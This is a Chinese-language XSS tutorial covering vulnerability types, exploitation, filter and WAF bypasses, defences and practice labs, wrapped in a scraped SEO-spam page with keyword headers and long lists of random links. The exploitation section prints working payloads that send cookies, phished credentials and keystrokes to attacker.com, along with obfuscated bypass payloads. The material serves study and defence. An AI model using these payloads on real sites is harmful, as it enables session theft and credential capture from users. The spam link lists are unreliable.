当前位置: 首页 > wzjs >正文

北海建设网站东坑做网站

北海建设网站,东坑做网站,广西住建领域培训考试系统,400电话单页网站XSS漏洞学习笔记 1. XSS漏洞基础 1.1 定义 跨站脚本攻击(Cross-Site Scripting,XSS)允许攻击者将恶意脚本注入到网页中,当其他用户访问时触发脚本执行,常用于窃取用户会话(Cookie)、钓鱼攻击、…

XSS漏洞学习笔记


1. XSS漏洞基础

1.1 定义

跨站脚本攻击(Cross-Site Scripting,XSS)允许攻击者将恶意脚本注入到网页中,当其他用户访问时触发脚本执行,常用于窃取用户会话(Cookie)、钓鱼攻击、键盘记录等。

1.2 漏洞成因

  • 未过滤用户输入:用户输入的数据被直接输出到页面。

  • 输出未编码:动态生成的页面未对特殊字符(如 <, >, &)进行转义。


2. XSS分类

2.1 反射型XSS(Reflected XSS)

  • 特点:恶意脚本通过URL参数注入,受害者点击构造的链接触发。

  • 场景:搜索框、错误页面等直接返回用户输入的内容。

  • 示例

    http://example.com/search?q=<script>alert(1)</script>  

2.2 存储型XSS(Stored XSS)

  • 特点:恶意脚本存储到服务器(如数据库),页面每次加载时自动执行。

  • 场景:留言板、用户昵称、文章评论等持久化数据的位置。

  • 示例

    html

    用户留言:<script>stealCookie()</script>  

    运行 HTML

2.3 DOM型XSS(DOM-based XSS)

  • 特点:漏洞由前端JavaScript动态操作DOM引发,不依赖服务器响应。

  • 场景:通过document.locationwindow.name等获取参数并输出到页面。

  • 示例

    javascript

    // 假设页面代码:  
    document.write("<div>" + location.hash.slice(1) + "</div>");  
    // 攻击URL:  
    http://example.com#<img src=x οnerrοr=alert(1)>  

3. XSS利用方式

3.1 窃取Cookie

  • Payload:

    html

    <script>fetch('http://attacker.com/?cookie='+document.cookie)</script>  

    运行 HTML

3.2 钓鱼攻击

  • Payload:

    html

    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white">  <h1>系统升级,请重新登录:</h1>  <form action="http://attacker.com/steal" method="POST">  <input type="text" name="username">  <input type="password" name="password">  </form>  
    </div>  

    运行 HTML

3.3 键盘记录

  • Payload:

    javascript

    document.addEventListener('keypress', (e) => {  fetch('http://attacker.com/log?key=' + e.key);  
    });  

3.4 绕过CSP(Content Security Policy)

  • 利用外部域名:若CSP允许unsafe-inline或特定域名,引入外部脚本:

    html

    <script src="http://attacker.com/malicious.js"></script>  

    运行 HTML

  • JSONP劫持:利用网站开放的JSONP接口窃取数据。


4. XSS绕过技巧

4.1 基础绕过

  • 闭合标签

    html

    "><script>alert(1)</script>  

    运行 HTML

  • 事件处理器

    html

    <img src=x οnerrοr=alert(1)>  
    <svg/οnlοad=alert(1)>  

    运行 HTML

  • 伪协议

    html

    <a href="javascript:alert(1)">点击</a>  

    运行 HTML

4.2 编码混淆

  • HTML实体编码

    html

    <img src=x οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">  

    运行 HTML

  • Unicode编码

    javascript

    <script>\u0061\u006c\u0065\u0072\u0074(1)</script>  
  • Base64编码(需配合data:协议):

    html

    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>  

    运行 HTML

4.3 绕过WAF/过滤器

  • 拆分关键字

    javascript

    <scr<script>ipt>alert(1)</scr</script>ipt>  
  • 利用JavaScript函数

    javascript

    eval('al' + 'ert(1)');  
    String.fromCharCode(97,108,101,114,116,40,49,41); // alert(1)  
  • 利用HTML标签属性

    html

    <input type="text" value="" autofocus οnfοcus=alert(1)>  

    运行 HTML

4.4 高级绕过技巧

  • 模板字符串注入(针对Node.js应用):

    javascript

    `${alert(1)}`  
  • Shadow DOM

    html

    <div><template shadowroot="open"><script>alert(1)</script></template></div>  

    运行 HTML

  • Service Worker劫持

    javascript

    navigator.serviceWorker.register('malicious-sw.js');  

5. XSS防御方案

5.1 输入验证与过滤

  • 白名单过滤:仅允许特定字符(如字母、数字)。

  • 黑名单过滤:删除或转义 <, >, &, ", ' 等危险字符。

5.2 输出编码

  • HTML实体编码:将 < 转为 <> 转为 >

  • JavaScript编码:使用 \xHH\uXXXX 编码特殊字符。

5.3 安全HTTP头

  • Content Security Policy (CSP)

    Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com;  
  • HttpOnly Cookie:防止JavaScript读取敏感Cookie。

5.4 框架安全特性

  • React:自动转义JSX中的变量(除非使用dangerouslySetInnerHTML)。

  • Vue{{ data }} 默认转义,v-html 需谨慎使用。


6. 测试工具与资源

6.1 工具

  • Burp Suite:拦截和修改HTTP请求,测试XSS Payload。

  • XSS Hunter:自动化检测XSS漏洞并收集数据。

  • BeEF(Browser Exploitation Framework):浏览器攻击框架。

6.2 靶场推荐

  • PortSwigger XSS Labs:系统化XSS练习环境。

  • DVWA(Damn Vulnerable Web Application)。

  • XSS Challenges(如printenv at xss-quiz.int21h.jp)。


文章转载自:

http://5VCiODBN.wdzmL.cn
http://FIcWILz4.wdzmL.cn
http://q5CWkbD2.wdzmL.cn
http://feYh66xu.wdzmL.cn
http://tJ6P2Udn.wdzmL.cn
http://nCvSmLOt.wdzmL.cn
http://WwGP5UOL.wdzmL.cn
http://ldX28I5i.wdzmL.cn
http://mt8F3QpS.wdzmL.cn
http://ZV03oFcO.wdzmL.cn
http://eYtCdwmV.wdzmL.cn
http://PZKHKXYh.wdzmL.cn
http://2RXTI5Om.wdzmL.cn
http://rSdzdkyG.wdzmL.cn
http://B6firf3T.wdzmL.cn
http://WdpnePpS.wdzmL.cn
http://GQiDjyFL.wdzmL.cn
http://ojWEkvVw.wdzmL.cn
http://d5iARdlh.wdzmL.cn
http://aJSlIA3U.wdzmL.cn
http://B7cQky2K.wdzmL.cn
http://FwABphic.wdzmL.cn
http://dxSnR0sl.wdzmL.cn
http://lQR6n7ve.wdzmL.cn
http://B6nsshOP.wdzmL.cn
http://ZN4Z71Gg.wdzmL.cn
http://n4QXJFKE.wdzmL.cn
http://187fbEvJ.wdzmL.cn
http://fy499uHT.wdzmL.cn
http://OEaoYXdi.wdzmL.cn
http://www.dtcms.com/wzjs/695838.html

相关文章:

  • 搭建网站需要钱吗网站建设中哪些最重要性
  • 江苏茂盛建设有限公司网站网站在线优化检测
  • 国内知名域名注册网站wordpress 连接qq视频教程
  • 网站推广产品哪个网站免费建站最好
  • 网站建设中单页源码华为的网络营销方式
  • 搞网站海淘网站入口
  • 浙江省专业网站制作网站建设国内it外包龙头企业
  • 高端的网站推广成都网站专业制作
  • 建设银行网站是多少广州公司关键词网络推广
  • 网站建设与发布需要什么公司微信网站开发平台
  • 姑苏营销型网站建设电话网站修改字体尺寸怎么做
  • 如何看一个网站是否做推广有哪些专门做校企合作的网站
  • 优化网站被百度屏淮北招聘网
  • 做俄罗斯生意网站平台app如何推广
  • 网站建设教程推荐莱芜论坛莱芜话题
  • 做网站的用什么电脑好网站建设的前后台代码
  • 用微信怎么做企业网站广州网站建设讯度
  • 母婴类网站怎么建设长沙关键词优化方法
  • 南平网站开发公司管理客户的免费软件
  • 网站容量js做示爱网站例子
  • 福州高端网站建设服务网络公司西安未央网站建设
  • 中小学生做试卷的网站6wordpress如何使用dplayer
  • 深圳建设集团网站首页做字的网站
  • 郑州网站加工宁波做网站烟台厂商
  • 台州地区网站建设win7 iis7 添加网站
  • 域名注册网站源码wordpress 极验
  • 网站建设课程设计摘要苏州公司变更
  • 导航网站的广告怎么做的四川建设厅官网查询官网
  • 广州建设大马路小学网站导航网站是怎么做的
  • 厦门seo网站关键词优推广昌邑市建设局官方网站